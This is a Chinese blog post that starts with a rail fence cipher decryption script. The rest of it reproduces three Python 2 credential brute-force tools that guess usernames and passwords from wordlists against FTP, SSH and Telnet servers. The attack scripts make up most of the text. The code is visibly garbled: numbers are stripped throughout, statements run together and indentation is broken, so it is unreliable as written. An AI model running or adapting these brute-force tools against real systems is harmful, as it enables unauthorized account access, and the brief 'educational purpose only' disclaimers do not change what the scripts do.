今天遇到一个要破解的栅栏密码，先给大家介绍通用的脚本。

方法一(通用脚本)：

#!/usr/bin/env python
 # -*- coding: gbk -*-
 # -*- coding: utf_ -*-
 e = raw_input(‘请输入要解密的字符串\\n‘)
 elen = len(e)
 field=[]
 for i in range(,elen):
       if(elen%i==):
         field.append(i)
 for f in field:
   b = elen / f
   result = {x:‘‘ for x in range(b)}
   for i in range(elen):
     a = i % b;
     result.update({a:result[a] + e[i]})
   d = ‘‘
   for i in range(b):
     d = d + result[i]
   print ‘分为\\t‘+str(f)+‘\\t‘+‘栏时，解密结果为： ‘+d

方法二：

FTP暴力破解脚本

#!/usr/bin/env python
#-*-coding = utf--*-
#author:@xfk
#blog:@blog.sina.com.cn/kaiyongdeng
#date:@--
import sys, os, time
from ftplib import FTP
docs = \"\"\"
      [*] This was written for educational purpose and pentest only. Use it at your own risk. 
      [*] Author will be not responsible for any damage!
      [*] Toolname : ftp_bf.py
      [*] Coder :
      [*] Version : .
      [*] eample of use : python ftp_bf.py -t ftp.server.com -u usernames.txt -p passwords.txt
    \"\"\"
if sys.platform == \'linux\' or sys.platform == \'linux\':
  clearing = \'clear\'
else:
  clearing = \'cls\'
os.system(clearing)
R = \"\\[m\";
G = \"\\[m\";
Y = \"\\[m\"
END = \"\\[m\"
def logo():
  print G+\"\\n |---------------------------------------------------------------|\"
  print \" | |\"
  print \" | blog.sina.com.cn/kaiyongdeng |\"
  print \" | // ftp_bf.py v.. |\"
  print \" | FTP Brute Forcing Tool |\"
  print \" | |\"
  print \" |---------------------------------------------------------------|\\n\"
  print \" \\n [-] %s\\n\" % time.strftime(\"%X\")
  print docs+END
def help():
  print R+\"[*]-t, --target ip/hostname <> Our target\"
  print \"[*]-u, --usernamelist usernamelist <> usernamelist path\"
  print \"[*]-p, --passwordlist passwordlist <> passwordlist path\"
  print \"[*]-h, --help help <> print this help\"
  print \"[*]Example : python ftp_bf -t ftp.server.com -u username.txt -p passwords.txt\"+END sys.exit()
def bf_login(hostname,username,password):
  # sys.stdout.write(\"\\r[!]Checking : %s \" % (p))
  # sys.stdout.flush()
  try:
    ftp = FTP(hostname)
    ftp.login(hostname,username, password)
    ftp.retrlines(\'list\')
    ftp.quit()
    print Y+\"\\n[!] wt,wt!!! We did it ! \"
    print \"[+] Target : \",hostname, \"\"
    print \"[+] User : \",username, \"\"
    print \"[+] Password : \",password, \"\"+END
    return 
  # sys.exit()
  except Exception, e:
    pass except KeyboardInterrupt: print R+\"\\n[-] Exiting ...\\n\"+END
  sys.exit()
def anon_login(hostname):
  try:
    print G+\"\\n[!] Checking for anonymous login.\\n\"+END
    ftp = FTP(hostname) ftp.login()
    ftp.retrlines(\'LIST\')
    print Y+\"\\n[!] wt,wt!!! Anonymous login successfuly !\\n\"+END
    ftp.quit()
  except Exception, e:
    print R+\"\\n[-] Anonymous login failed...\\n\"+END
    pass
def main():
  logo()
  try:
    for arg in sys.argv:
      if arg.lower() == \'-t\' or arg.lower() == \'--target\':
        hostname = sys.argv[int(sys.argv[:].index(arg))+]
      elif arg.lower() == \'-u\' or arg.lower() == \'--usernamelist\':
        usernamelist = sys.argv[int(sys.argv[:].index(arg))+]
      elif arg.lower() == \'-p\' or arg.lower() == \'--passwordlist\':
        passwordlist = sys.argv[int(sys.argv[:].index(arg))+]
      elif arg.lower() == \'-h\' or arg.lower() == \'--help\':
        help()
      elif len(sys.argv) <= :
        help()
  except:
    print R+\"[-]Cheak your parametars input\\n\"+END
    help()
  print G+\"[!] BruteForcing target ...\"+END
  anon_login(hostname)
  # print \"here is ok\"
  # print hostname
  try:
    usernames = open(usernamelist, \"r\")
    user = usernames.readlines()
    count = 
    while count < len(user):
      user[count] = user[count].strip()
      count +=
  except:
    print R+\"\\n[-] Cheak your usernamelist path\\n\"+END
    sys.exit()
  # print \"here is ok \",usernamelist,passwordlist
  try:
    passwords = open(passwordlist, \"r\")
    pwd = passwords.readlines()
    count = 
    while count < len(pwd):
      pwd[count] = pwd[count].strip()
      count +=
  except:
    print R+\"\\n[-] Check your passwordlist path\\n\"+END
    sys.exit()
  print G+\"\\n[+] Loaded:\",len(user),\"usernames\"
  print \"\\n[+] Loaded:\",len(pwd),\"passwords\"
  print \"[+] Target:\",hostname
  print \"[+] Guessing...\\n\"+END
  for u in user: for p in pwd:
    result = bf_login(hostname,u.replace(\"\\n\",\"\"),p.replace(\"\\n\",\"\"))
    if result != :
      print G+\"[+]Attempt uaername:%s password:%s...\" % (u,p) + R+\"Disenable\"+END
    else:
      print G+\"[+]Attempt uaername:%s password:%s...\" % (u,p) + Y+\"Enable\"+END
    if not result :
      print R+\"\\n[-]There is no username ans password enabled in the list.\"
      print \"[-]Exiting...\\n\"+END
if __name__ == \"__main__\":
  main()

SSH暴力破解

#!/usr/bin/env python
#-*-coding = UTF--*-
#author@:dengyongkai
#blog@:blog.sina.com.cn/kaiyongdeng
import sys
import os
import time
#from threading import Thread
try:
  from paramiko import SSHClient
  from paramiko import AutoAddPolicy
except ImportError:
  print G+\'\'\'
  You need paramiko module.
http://www.lag.net/paramiko/
  Debian/Ubuntu: sudo apt-get install aptitude
     : sudo aptitude install python-paramiko\\n\'\'\'+END
  sys.exit()
docs = \"\"\"
      [*] This was written for educational purpose and pentest only. Use it at your own risk.
      [*] Author will be not responsible for any damage!                               
      [*] Toolname    : ssh_bf.py
      [*] Author     : xfk
      [*] Version     : v..
      [*] Example of use : python ssh_bf.py [-T target] [-P port] [-U userslist] [-W wordlist] [-H help]
  \"\"\"
if sys.platform == \'linux\' or sys.platform == \'linux\':
     clearing = \'clear\'
else: 
     clearing = \'cls\'
os.system(clearing)
R = \"\\[m\";
G = \"\\[m\";
Y = \"\\[m\"
END = \"\\[m\"
def logo():
     print G+\"\\n        |---------------------------------------------------------------|\"
     print \"        |                                |\"
     print \"        |        blog.sina.com.cn/kaiyongdeng          |\"
     print \"        |        // ssh_bf.py v..           |\"
     print \"        |         SSH Brute Forcing Tool            |\"
     print \"        |                                |\"
     print \"        |---------------------------------------------------------------|\\n\"
     print \" \\n           [-] %s\\n\" % time.ctime()
     print docs+END
def help():
  print Y+\"    [*]-H    --hostname/ip    <>the target hostname or ip address\"
  print \"   [*]-P    --port     <>the ssh service port(default is )\"
  print \"   [*]-U    --usernamelist   <>usernames list file\"
  print \"   [*]-P    --passwordlist   <>passwords list file\"
  print \"   [*]-H    --help     <>show help information\"
  print \"   [*]Usage:python %s [-T target] [-P port] [-U userslist] [-W wordlist] [-H help]\"+END
  sys.exit()
def BruteForce(hostname,port,username,password):
    \'\'\'
    Create SSH connection to target
    \'\'\'
    ssh = SSHClient()
    ssh.set_missing_host_key_policy(AutoAddPolicy())
    try:
      ssh.connect(hostname, port, username, password, pkey=None, timeout = None, allow_agent=False, look_for_keys=False)
      status = \'ok\'
      ssh.close()
    except Exception, e:
      status = \'error\'
      pass
  return status
def makelist(file):
  \'\'\'
  Make usernames and passwords lists
  \'\'\'
  items = []
  try:
    fd = open(file, \'r\')
  except IOError:
    print R+\'unable to read file \\\'%s\\\'\' % file+END
    pass
  except Exception, e:
    print R+\'unknown error\'+END
    pass
  for line in fd.readlines():
    item = line.replace(\'\\n\', \'\').replace(\'\\r\', \'\')
    items.append(item)
  fd.close() 
  return items
def main():
    logo() 
#  print \"hello wold\"
    try:  
        for arg in sys.argv:
            if arg.lower() == \'-t\' or arg.lower() == \'--target\':
                hostname = str(sys.argv[int(sys.argv[:].index(arg))+])
        if arg.lower() == \'-p\' or arg.lower() == \'--port\':
          port = sys.argv[int(sys.argv[:].index(arg))+]
            elif arg.lower() == \'-u\' or arg.lower() == \'--userlist\':
                userlist = sys.argv[int(sys.argv[:].index(arg))+]
            elif arg.lower() == \'-w\' or arg.lower() == \'--wordlist\':
                wordlist = sys.argv[int(sys.argv[:].index(arg))+]
            elif arg.lower() == \'-h\' or arg.lower() == \'--help\':
                help()
      elif len(sys.argv) <= :
                help()
    except:
        print R+\"[-]Cheak your parametars input\\n\"+END
        help()
    print G+\"\\n[!] BruteForcing target ...\\n\"+END
#    print \"here is ok\"
#    print hostname,port,wordlist,userlist
    usernamelist = makelist(userlist)
    passwordlist = makelist(wordlist)
    print Y+\"[*] SSH Brute Force Praparing.\"
    print \"[*] %s user(s) loaded.\" % str(len(usernamelist))
    print \"[*] %s password(s) loaded.\" % str(len(passwordlist))
    print \"[*] Brute Force Is Starting.......\"+END
  try:
      for username in usernamelist:
        for password in passwordlist:
        print G+\"\\n[+]Attempt uaername:%s password:%s...\" % (username,password)+END
            current = BruteForce(hostname, port, username, password)
              if current == \'error\':
          print R+\"[-]O*O The username:%s and password:%s Is Disenbabled...\\n\" % (username,password)+END
#                pass
              else:
                  print G+\"\\n[+] ^-^ HaHa,We Got It!!!\"
                  print \"[+] username: %s\" % username
                  print \"[+] password: %s\\n\" % password+END
#                  sys.exit()
  except:
    print R+\"\\n[-] There Is Something Wrong,Pleace Cheak It.\"
    print \"[-] Exitting.....\\n\"+END
    raise
    print Y+\"[+] Done.^-^\\n\"+END
    sys.exit()
if __name__ == \"__main__\":
  main()

TELNET密码暴力破解

#!usr/bin/python
#Telnet Brute Forcer
#http://www.darkcde.com
#dhydr[at]gmail[dot]com
import threading, time, random, sys, telnetlib
from copy import copy
if len(sys.argv) !=:
  print \"Usage: ./telnetbrute.py   \"
  sys.exit()
try:
  users = open(sys.argv[], \"r\").readlines()
except(IOError):
  print \"Error: Check your userlist path\\n\"
  sys.exit()
try:
  words = open(sys.argv[], \"r\").readlines()
except(IOError):
  print \"Error: Check your wordlist path\\n\"
  sys.exit()
print \"\\n\\t  dhydr[at]gmail[dot]com TelnetBruteForcer v.\"
print \"\\t--------------------------------------------------\\n\"
print \"[+] Server:\",sys.argv[]
print \"[+] Users Loaded:\",len(users)
print \"[+] Words Loaded:\",len(words),\"\\n\"
wordlist = copy(words)
def reloader():
  for word in wordlist:
    words.append(word)
def getword():
  lock = threading.Lock()
  lock.acquire()
  if len(words) != :
    value = random.sample(words, )
    words.remove(value[])
  else:
    print \"\\nReloading Wordlist - Changing User\\n\"
    reloader()
    value = random.sample(words, )
    users.remove(users[])
  lock.release()
  if len(users) ==:
    return value[][:-], users[]
  else:
    return value[][:-], users[][:-]
class Worker(threading.Thread):
  def run(self):
    value, user = getword()
    try:
      print \"-\"*
      print \"User:\",user,\"Password:\",value
      tn = telnetlib.Telnet(sys.argv[])
      tn.read_until(\"login: \")
      tn.write(user + \"\\n\")
      if password:
          tn.read_until(\"Password: \")
          tn.write(value + \"\\n\")
      tn.write(\"ls\\n\")
      tn.write(\"exit\\n\")
      print tn.read_all()
      print \"\\t\\nLogin successful:\",value, user
      tn.close()
      work.join()
      sys.exit()
    except:
      pass
for I in range(len(words)*len(users)):
  work = Worker()
  work.start()
  time.sleep()